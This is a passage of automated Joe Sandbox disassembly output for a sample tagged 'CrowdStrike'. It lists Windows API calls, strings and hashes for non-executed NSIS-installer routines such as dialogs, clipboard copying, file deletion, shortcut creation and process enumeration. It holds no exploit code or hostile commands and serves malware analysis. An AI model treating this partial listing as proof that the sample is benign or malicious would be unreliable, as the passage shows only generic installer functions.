                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                                                        Non-executed Functions

                                                                        Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                        • API String ID: 2110491804-2409696222
                                                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                        Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $ @$M$N
                                                                        • API String ID: 1638840714-3479655940
                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                        Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                        • String ID: 82D$@%F$@rD$A
                                                                        • API String ID: 3347642858-1086125096
                                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                        Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                        • API String ID: 1916479912-1189179171
                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                        Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                        Strings
                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                        • \*.*, xrefs: 00406D03
                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                        • API String ID: 2035342205-3294556389
                                                                        • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                        • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                        Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 3581403547-784952888
                                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                        Strings
                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                        • API String ID: 542301482-1377821865
                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                        Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                        • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                        Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                        • API String ID: 20674999-2124804629
                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                        Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                        • EnableWindow.USER32(?,?), ref: 0040573C
                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
